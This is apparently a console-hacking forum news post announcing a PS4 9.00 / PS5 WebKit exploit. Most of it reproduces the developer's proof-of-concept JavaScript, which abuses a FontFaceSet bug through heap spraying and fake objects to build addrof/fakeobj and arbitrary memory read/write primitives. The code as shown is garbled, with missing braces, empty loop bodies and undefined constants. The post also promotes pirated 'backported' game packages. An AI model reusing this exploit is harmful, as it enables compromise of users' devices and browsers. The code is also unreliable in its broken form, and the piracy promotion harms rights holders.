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Earlier this week PS4Scene developer @sleirsgoevy expressed interest in feedback of his FontFaceSet Vulnerability PoC based on the previously released code, and today he shared a PS4 WebKit Exploit (Github) on 9.00 Firmware... which has also been confirmed by @zecoxao via Twitter among others as a userland entry point on the latest PS5 Firmware 4.03 Update! 😍

:alert: As usual, it's currently not advisable by scene developers to update neither your PS4 nor PS5 consoles... remember this is only a WebKit Exploit, and that a Kernel Exploit (KEX) is also required for a full PS4 Jailbreak or PS5 Jailbreak release. :alert:
While many are still battling PS5 Scalpers to obtain a console for testing the feasibility of Private PS4 Exploits in a PlayStation 5 Jailbreak, below are some related articles (sorted by date with the oldest first) for those new in the scene:
⚠️ Additionally, developer @CTurt (aka CTurtE on Twitter) has yet to publicly disclose any specific details on his $10K PlayStation Bug Bounty reward at achieved this past August, so keep in mind it may be quite awhile before the required Kernel Exploit surfaces for a full PS4 Jailbreak or PS5 Jailbreak to arrive. ⚠️

From ps4.html via sleirsgoevy on Twitter comes source code to achieve arbitrary read / write and addrof / fakeobj for those interested:
var PAGE_SIZE = 16384;
var SPRAY_FONTS = 0x1000;
var GUESS_FONT = 0x200430000;
var NPAGES = 20;
var HAMMER_FONT_NAME = "font8"; //must take bucket 3 of 8 (counting from zero)
var HAMMER_NSTRINGS = 700; //tweak this if crashing during hammer time

function poc(){

function hex(n)
    if((typeof n) != "number")
        return ""+n;
    return "0x" + (new Number(n)).toString(16);

var union = new ArrayBuffer(8);
var union_b = new Uint8Array(union);
var union_i = new Uint32Array(union);
var union_f = new Float64Array(union);

var bad_fonts = [];

for(var i = 0; i < SPRAY_FONTS; i++)
    bad_fonts.push(new FontFace("font1", "", {}));

var good_font = new FontFace("font2", "url(data:text/html,)", {});

var arrays = [];
for(var i = 0; i < 512; i++)
    arrays.push(new Array(31));

arrays[256][0] = 1.5;
arrays[257][0] = {};
arrays[258][0] = 1.5;

var jsvalue = {a: arrays[256], b: new Uint32Array(1), c: true};

var string_atomifier = {};
var string_id = 10000000;

function ptrToString(p)
    var s = '';
    for(var i = 0; i < 8; i++)
        s += String.fromCharCode(p % 256);
        p = (p - p % 256) / 256;
    return s;

function stringToPtr(p, o)
    if(o === undefined)
        o = 0;
    var ans = 0;
    for(var i = 7; i >= 0; i--)
        ans = 256 * ans + p.charCodeAt(o+i);
    return ans;

var strings = [];

function mkString(l, head)
    var s = head + '\u0000'.repeat(l-STRING_OFFSET-8-head.length) + (string_id++);
    string_atomifier[s] = 1;
    return s;

var guf = GUESS_FONT;
var ite = true;
var matches = 0;


var p_s = ptrToString(NPAGES+2); // vector.size()
for(var i = 0; i < NPAGES; i++)
    p_s += ptrToString(guf + i * PAGE_SIZE);
p_s += ptrToString(INVALID_POINTER);

for(var i = 0; i < 256; i++)
    mkString(HASHMAP_BUCKET, p_s);

var ffs = new FontFaceSet(bad_fonts);

var badstr1 = mkString(HASHMAP_BUCKET, p_s);

var guessed_font = null;
var guessed_addr = null;

for(var i = 0; i < SPRAY_FONTS; i++)
    bad_fonts[i].family = "evil";
    if(badstr1.substr(0, p_s.length) != p_s)
        guessed_font = i;
        var p_s1 = badstr1.substr(0, p_s.length);
        for(var i = 1; i <= NPAGES; i++)
            if(p_s1.substr(i*8, 8) != p_s.substr(i*8, 8))
                guessed_addr = stringToPtr(p_s.substr(i*8, 8));
        if(matches++ == 0)
            guf = guessed_addr + 2 * PAGE_SIZE;
            guessed_addr = null;

if((ite = !ite))
    guf += NPAGES * PAGE_SIZE;

while(guessed_addr === null);

alert("guessed fontface addr: "+guessed_font+" -> "+hex(guessed_addr));

var p_s = '';
p_s += ptrToString(26);
p_s += ptrToString(guessed_addr);
p_s += ptrToString(guessed_addr + SIZEOF_CSS_FONT_FACE);
for(var i = 0; i < 19; i++)
    p_s += ptrToString(INVALID_POINTER);

for(var i = 0; i < 256; i++)
    mkString(HASHMAP_BUCKET, p_s);

var ffs2 = new FontFaceSet([bad_fonts[guessed_font], bad_fonts[guessed_font+1], good_font]);
var badstr2 = mkString(HASHMAP_BUCKET, p_s);
mkString(HASHMAP_BUCKET, p_s);

bad_fonts[guessed_font].family = "evil2";
bad_fonts[guessed_font+1].family = "evil3";

var leak = stringToPtr(badstr2.substr(badstr2.length-8));
alert("stringimpl leak: "+hex(leak));

var ffses = {};

function makeReader(read_addr, ffs_name)
    var fake_s = '';
    fake_s += '0000'; //padding for 8-byte alignment
    fake_s += '\u00ff\u0000\u0000\u0000\u00ff\u00ff\u00ff\u00ff'; //refcount=255, length=0xffffffff
    fake_s += ptrToString(read_addr); //where to read from
    fake_s += ptrToString(0x80000014); //some fake non-zero hash, atom, 8-bit
    p_s = '';
    p_s += ptrToString(29);
    p_s += ptrToString(guessed_addr);
    p_s += ptrToString(guessed_addr + SIZEOF_CSS_FONT_FACE);
    p_s += ptrToString(guessed_addr + 2 * SIZEOF_CSS_FONT_FACE);
    for(var i = 0; i < 18; i++)
        p_s += ptrToString(INVALID_POINTER);
    for(var i = 0; i < 256; i++)
        mkString(HASHMAP_BUCKET, p_s);
    var the_ffs = ffses[ffs_name] = new FontFaceSet([bad_fonts[guessed_font], bad_fonts[guessed_font+1], bad_fonts[guessed_font+2], good_font]);
    mkString(HASHMAP_BUCKET, p_s);
    var relative_read = mkString(HASHMAP_BUCKET, fake_s);
    bad_fonts[guessed_font].family = ffs_name+"_evil1";
    bad_fonts[guessed_font+1].family = ffs_name+"_evil2";
    bad_fonts[guessed_font+2].family = ffs_name+"_evil3";
    if(relative_read.length < 1000) //failed
        return makeReader(read_addr, ffs_name+'_');
    return relative_read;

var fastmalloc = makeReader(leak, 'ffs3'); //read from leaked string ptr
alert("fastmalloc.length = "+fastmalloc.length);

for(var i = 0; i < 100000; i++)
    mkString(128, '');

var props = [];
for(var i = 0; i < 0x400; i++)
    props.push({value: 0x41434442});
    props.push({value: jsvalue});

var jsvalue_leak = null;

while(jsvalue_leak === null)
    Object.defineProperties({}, props);
    for(var i = 0; i < 0x100000; i++)
        if(fastmalloc.charCodeAt(i) == 0x42
        && fastmalloc.charCodeAt(i+1) == 0x44
        && fastmalloc.charCodeAt(i+2) == 0x43
        && fastmalloc.charCodeAt(i+3) == 0x41
        && fastmalloc.charCodeAt(i+4) == 0
        && fastmalloc.charCodeAt(i+5) == 0
        && fastmalloc.charCodeAt(i+6) == 254
        && fastmalloc.charCodeAt(i+7) == 255
        && fastmalloc.charCodeAt(i+24) == 14
            jsvalue_leak = stringToPtr(fastmalloc, i+32);

alert("jsvalue leak: " + jsvalue + " -> " + hex(jsvalue_leak));

var rd_leak = makeReader(jsvalue_leak, 'ffs4');
var array256 = stringToPtr(rd_leak, 16); //arrays[256]
var ui32a = stringToPtr(rd_leak, 24); //Uint32Array
var sanity = stringToPtr(rd_leak, 32);
alert("array256="+hex(array256)+" ui32a="+hex(ui32a)+" sanity="+hex(sanity));

var rd_arr = makeReader(array256, 'ffs5');
var butterfly = stringToPtr(rd_arr, 8);

var rd_ui32 = makeReader(ui32a, 'ffs6');
for(var i = 0; i < 8; i++)
    union_b[i] = rd_ui32.charCodeAt(i);

var structureid_low = union_i[0];
var structureid_high = union_i[1];

alert("butterfly="+hex(butterfly)+" structureid="+structureid_low);

//setup for addrof/fakeobj
//in array[256] butterfly: 0 = &bad_fonts[guessed_font+12] as double
//in array[257] butterfly: 0 = {0x10000, 0x10000} as jsvalue
union_i[0] = 0x10000;
union_i[1] = 0; //account for nan-boxing
arrays[257][1] = {}; //force it to still be jsvalue-array not double-array
arrays[257][0] = union_f[0];
union_i[0] = (guessed_addr + 12 * SIZEOF_CSS_FONT_FACE) | 0;
union_i[1] = (guessed_addr - guessed_addr % 0x100000000) / 0x100000000;
arrays[256][i] = union_f[0];

//hammer time!

pp_s = '';
pp_s += ptrToString(56);
for(var i = 0; i < 12; i++)
    pp_s += ptrToString(guessed_addr + i * SIZEOF_CSS_FONT_FACE);

var fake_s = '';
fake_s += '0000'; //padding for 8-byte alignment
fake_s += ptrToString(INVALID_POINTER); //never dereferenced
fake_s += ptrToString(butterfly); //hammer target
fake_s += '\u0000\u0000\u0000\u0000\u0022\u0000\u0000\u0000'; //length=34

var ffs7_args = [];
for(var i = 0; i < 12; i++)

var ffs8_args = [bad_fonts[guessed_font+12]];
for(var i = 0; i < 5; i++)
    ffs8_args.push(new FontFace(HAMMER_FONT_NAME, "url(data:text/html,)", {}));

for(var i = 0; i < HAMMER_NSTRINGS; i++)
    mkString(HASHMAP_BUCKET, pp_s);

var ffs7 = new FontFaceSet(ffs7_args);
mkString(HASHMAP_BUCKET, pp_s);
var ffs8 = new FontFaceSet(ffs8_args);
mkString(HASHMAP_BUCKET, fake_s);

for(var i = 0; i < 13; i++)
    bad_fonts[guessed_font+i].family = "hammer"+i;


window.addrof = function(obj)
    arrays[257][32] = obj;
    union_f[0] = arrays[258][0];
    return union_i[1] * 0x100000000 + union_i[0];

window.fakeobj = function(addr)
    union_i[0] = addr;
    union_i[1] = (addr - addr % 0x100000000) / 0x100000000;
    arrays[258][0] = union_f[0];
    return arrays[257][32];

alert("addrof(null)="+addrof(null)+" fakeobj(10)="+fakeobj(10));

//craft misaligned typedarray

var arw_master = new Uint32Array(8);
var arw_slave = new Uint8Array(1);

var addrof_slave = addrof(arw_slave);
union_i[0] = structureid_low;
union_i[1] = structureid_high;
union_b[6] = 7;
var obj = {jscell: union_f[0], butterfly: true, buffer: arw_master, size: 0x5678};

    var magic = fakeobj(addrof(obj) + 16);
    magic[4] = addrof_slave;
    magic[5] = (addrof_slave - addrof_slave % 0x100000000) / 0x100000000;
    magic = null;

window.read_mem = function(p, sz)
    arw_master[4] = p;
    arw_master[5] = (p - p % 0x100000000) / 0x100000000;
    arw_master[6] = sz;
    var buf = [];
    for(var i = 0; i < sz; i++)
    return buf;

window.write_mem = function(p, buf)
    arw_master[4] = p;
    arw_master[5] = (p - p % 0x100000000) / 0x100000000;
    arw_master[6] = buf.length;
    for(var i = 0; i < sz; i++)
        arw_slave[i] = buf[i];

alert(read_mem(addrof(obj), 48));

<button onclick="try{poc()}catch(e){alert(e);}">click me</button>
:idea: In the meantime many PS4 Game Backports are available, so get your Verified Badge from the Floating Discord Channel for the latest PS4 PKGs... including recently 'dumped' PS4 8.52 - 9.00 Games like Lost Judgment (CUSA28183) v1.03 backported to 5.05 by @opoisso893 (aka backport893) alongside the Lost Judgment DLC School Stories Expansion and Lost Judgment DLC Detective Essentials Packs. 🏴‍☠️

Cheers to @jwooh for passing along this PS4 Scene and PS5 Scene news earlier today and YakuzaMink on Twitter for the demo video screenshot below! 🍻

Spoiler: Related Tweets

PS4 9.00 & PS5 WebKit Exploit by Sleirsgoevy, Kernel Exploit Required!.jpg


Awesome! I ordered in December and got my PS5 in March 2021. Mine is on FW 2.30. :D And I know that yours is on FW 1.00. Doesn't matter because FW 9.00 is exploitable and all we have to wait is kernel exploit! :giggle:
Do you really think they are going to release a KE for the ps5? I wouldn’t hold your breath , even if they already have it, they wouldn’t release it.
I don’t blame them.
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